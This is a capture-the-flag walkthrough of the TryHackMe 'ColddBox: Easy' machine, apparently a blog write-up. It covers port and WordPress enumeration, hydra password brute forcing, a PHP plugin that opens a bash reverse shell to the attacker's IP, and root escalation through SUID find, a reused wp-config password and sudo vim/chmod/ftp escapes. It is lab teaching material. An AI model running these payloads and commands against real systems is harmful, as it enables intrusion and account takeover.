TryHackMe: ColddBoxEasy
ColddBox: Easy [https://tryhackme.com/room/colddboxeasy]
Can you get access and get both flags?
Good Luck!.�
Doubts and / or help in twitter: @C0ldd__ or @ColddSecurity
Thumbnail box image credits, designed by Freepik from www.flaticon.es
Enumeration
Let's break out rustscan
.......
rustscan -a ColddBoxEasy -- -sC -sV -oA ColddBoxEasy -v -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.209.247:80
Open 10.10.209.247:4512
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-06 21:22 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 0.00s elapsed
Initiating Ping Scan at 21:22
Scanning 10.10.209.247 [2 ports]
Completed Ping Scan at 21:22, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 21:22
Scanning ColddBoxEasy (10.10.209.247) [2 ports]
Discovered open port 80/tcp on 10.10.209.247
Discovered open port 4512/tcp on 10.10.209.247
Completed Connect Scan at 21:22, 0.04s elapsed (2 total ports)
Initiating Service scan at 21:22
Scanning 2 services on ColddBoxEasy (10.10.209.247)
Completed Service scan at 21:22, 7.02s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.209.247.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:22
Completed NSE at 21:23, 1.42s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.16s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
Nmap scan report for ColddBoxEasy (10.10.209.247)
Host is up, received syn-ack (0.032s latency).
Scanned at 2021-01-06 21:22:52 GMT for 9s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
4512/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDngxJmUFBAeIIIjZkorYEp5ImIX0SOOFtRVgperpxbcxDAosq1rJ6DhWxJyyGo3M+Fx2koAgzkE2d4f2DTGB8sY1NJP1sYOeNphh8c55Psw3Rq4xytY5u1abq6su2a1Dp15zE7kGuROaq2qFot8iGYBVLMMPFB/BRmwBk07zrn8nKPa3yotvuJpERZVKKiSQrLBW87nkPhPzNv5hdRUUFvImigYb4hXTyUveipQ/oji5rIxdHMNKiWwrVO864RekaVPdwnSIfEtVevj1XU/RmG4miIbsy2A7jRU034J8NEI7akDB+lZmdnOIFkfX+qcHKxsoahesXziWw9uBospyhB
| 256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKNmVtaTpgUhzxZL3VKgWKq6TDNebAFSbQNy5QxllUb4Gg6URGSWnBOuIzfMAoJPWzOhbRHAHfGCqaAryf81+Z8=
| 256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE/fNq/6XnAxR13/jPT28jLWFlqxd+RKSbEgujEaCjEc
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.40 seconds
4512/tcp ssh
We do not yet have a username/password so we will skip this and head over to the web port.
80/tcp http
As we can see from the scan the server is running wordpress
and an old version 4.1.31
.
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
User Flag
As we are running an old version of wordpress
lets break out wpscan
╭─tj at kali in ~/pentest/ctfs/ColddBoxEasy on master✘✘✘ 21-01-06 - 21:32:23
╰─⠠⠵ wpscan --url http://ColddBoxEasy -e vp,vt,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.12
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://colddboxeasy/ [10.10.209.247]
[+] Started: Wed Jan 6 21:32:41 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://colddboxeasy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://colddboxeasy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://colddboxeasy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://colddboxeasy/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
| - http://colddboxeasy/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
[+] WordPress theme in use: twentyfifteen
| Location: http://colddboxeasy/wp-content/themes/twentyfifteen/
| Last Updated: 2020-12-09T00:00:00.000Z
| Readme: http://colddboxeasy/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://colddboxeasy/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://colddboxeasy/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:02 <=============================================> (330 / 330) 100.00% Time: 00:00:02
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] [REDACTED]
| Found By: Rss Generator (Passive Detection)
[+] [REDACTED]
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] [REDACTED]
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] [REDACTED]
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Jan 6 21:32:49 2021
[+] Requests Done: 360
[+] Cached Requests: 37
[+] Data Sent: 93.274 KB
[+] Data Received: 97.168 KB
[+] Memory used: 227.223 MB
[+] Elapsed time: 00:00:08
Ok so we have a few users to look at but vulnerable plugins or themes detected.
- [REDACTED]
- [REDACTED]
- [REDACTED]
- [REDACTED]
Before we try a brute force on any of these lets take a look around the site....
Hydra Wordpress Brute Force
Ok so lets try the RockYou.txt against the users above
╰─⠠⠵ hydra -L wpusers -P /usr/share/wordlists/rockyou.txt colddboxeasy -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Success we have a password quickly via the above
[80][http-post-form] host: colddboxeasy login: [REDACTED] password: [REDACTED]
Checking the user
section of wordpress
we can see that we are an admin..
Remote Shell
Having a quick look around in there are no interesting posts or pages so let's do our usual trick of uploading a php
reverse shell as a plugin
<?php
/**
* Plugin Name: Wordpress Maint Shell
* Author: Wordpress
**/
exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.9.5.198/4444 0>&1'\")
?>
And start the listener on our box
nc -lvnp 4444
Once we zip up, upload and activate the above php
we should get a callback....
connect to [10.9.5.198] from (UNKNOWN) [10.10.209.247] 34272
bash: cannot set terminal process group (1402): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ColddBox-Easy:/var/www/html/wp-admin$
www-data@ColddBox-Easy:/var/www/html/wp-admin$
Let's do the usual to get the fancy shell that we do not break with a Ctrl+C ...
www-data@ColddBox-Easy:/var/www/html/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash")'
</www/html/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ColddBox-Easy:/var/www/html/wp-admin$ export TERM=xterm
export TERM=xterm
www-data@ColddBox-Easy:/var/www/html/wp-admin$
www-data@ColddBox-Easy:/var/www/html/wp-admin$ ^Z
[1] + 10211 suspended nc -lvnp 4444
╭─tj at kali in ~/pentest/ctfs/ColddBoxEasy on master✘✘✘ 21-01-06 - 21:54:11
╰─⠠⠵ stty raw -echo; fg
[1] + 10211 continued nc -lvnp 4444
www-data@ColddBox-Easy:/var/www/html/wp-admin$
Display all 1365 possibilities? (y or n)
www-data@ColddBox-Easy:/var/www/html/wp-admin$
Looking around the www
directory we see a directory called [REDACTED]
www-data@ColddBox-Easy:/var/www/html/[REDACTED]$ cat index.html
<!DOCTYPE html>
<html>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=UTF-8″ />
<title>Hidden Place</title>
</head>
<body>
<div align="center">
<h1>U-R-G-E-N-T</h1>
<h2>[REDACTED], you changed [REDACTED]'s password, when you can send it to him so he can continue uploading his articles. [REDACTED]</h2>
</div>
</body>
</html>
Interesting we will keep a note of that for later.... Anyway jumping into [REDACTED]
's home directory we have user.txt
Getting the flags
Ok, so I found more than one way to skin this box .....
Method #1 /usr/bin/find
www-data@ColddBox-Easy:/home/[REDACTED]$ cat user.txt
cat: user.txt: Permission denied
Ah well its never that easy anymore..... So we need to priv esc to [REDACTED]
to be able to read it, let grab linpeas.sh
and see what can find.
The first thing that jumps out as output fly's past is /usr/bin/find
under SUID
....
www-data@ColddBox-Easy:/tmp$ ls -l /usr/bin/find
-rwsr-xr-x 1 root root 221768 Feb 8 2016 /usr/bin/find
Checking out GTFOBins ....
So let's give it a try
www-data@ColddBox-Easy:/tmp$ /usr/bin/find . -exec /bin/bash -p \; -quit
bash-4.3# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
Ok, so our effective user ID is root
so let's grab the flags.
bash-4.3# cat /home/[REDACTED]/user.txt
[REDACTED]
bash-4.3# cat /home/[REDACTED]/user.txt | base64 -d
[REDACTED]
bash-4.3# cat /root/root.txt
[REDACTED]
bash-4.3# cat /root/root.txt | base64 -d
[REDACTED]
Method #2 - Password Re-use
Looking the the web root at wp-config.php
we see the credentials below for the database:
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');
/** MySQL database username */
define('DB_USER', '[REDACTED]');
/** MySQL database password */
define('DB_PASSWORD', '[REDACTED]');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
As the linux username is the same let's try the password [REDACTED]
...
$ su - [REDACTED]
Password:
That worked! We are now in as [REDACTED]
so can read the user.txt
[REDACTED]@ColddBox-Easy:~$ ls
user.txt
[REDACTED]@ColddBox-Easy:~$ cat user.txt
[REDACTED]
Let's take a look if we can run anything as sudo
[REDACTED]@ColddBox-Easy:~$ sudo -l
[sudo] password for [REDACTED]:
Coincidiendo entradas por defecto para [REDACTED] en ColddBox-Easy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario [REDACTED] puede ejecutar los siguientes comandos en ColddBox-Easy:
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp
Ok so we have a few commands there we can run as root
...
VIM
https://gtfobins.github.io/gtfobins/vim/#sudo
[REDACTED]@ColddBox-Easy:~$ sudo vim -c ':!/bin/sh'
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
[REDACTED]
CHMOD
https://gtfobins.github.io/gtfobins/chmod/#sudo
[REDACTED]@ColddBox-Easy:~$ sudo chmod -R 755 /root; cat /root/root.txt
[REDACTED]
FTP
https://gtfobins.github.io/gtfobins/ftp/#sudo
[REDACTED]@ColddBox-Easy:~$ sudo ftp
ftp> !/bin/bash
root@ColddBox-Easy:~# cat /root/root.txt
[REDACTED]